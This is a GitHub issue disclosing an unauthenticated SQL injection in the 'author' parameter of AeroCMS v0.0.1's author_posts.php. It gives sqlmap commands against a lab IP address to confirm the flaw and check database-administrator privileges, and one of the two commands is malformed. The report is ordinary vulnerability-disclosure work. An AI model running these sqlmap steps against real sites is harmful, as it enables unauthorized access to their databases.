Skip to content
This repository has been archived by the owner on May 8, 2023. It is now read-only.

AeroCMS v0.0.1 Frontend sql Injection vulnerability #6

Open
w4n95 opened this issue Nov 27, 2022 · 0 comments
Open

AeroCMS v0.0.1 Frontend sql Injection vulnerability #6

w4n95 opened this issue Nov 27, 2022 · 0 comments

Comments

@w4n95
Copy link

w4n95 commented Nov 27, 2022

  • Description

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the "author" parameter at \author_posts.php. This vulnerability allows attackers does not require authentication to obtain database administrator privileges and access database information. etc.

  • Reproduct

  1. No login required. execute sqlmap command: python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author",we can see SQL injection vulnerability exists in the "author"parameter
    image

  2. execute sqlmap command: python sqlmap.py -u "python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author" --is-dba,we can see "DBA: TRUE"
    image

  • Vulnerable Code

The “author” parameter is not escaped before executing the sql query statement
image

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant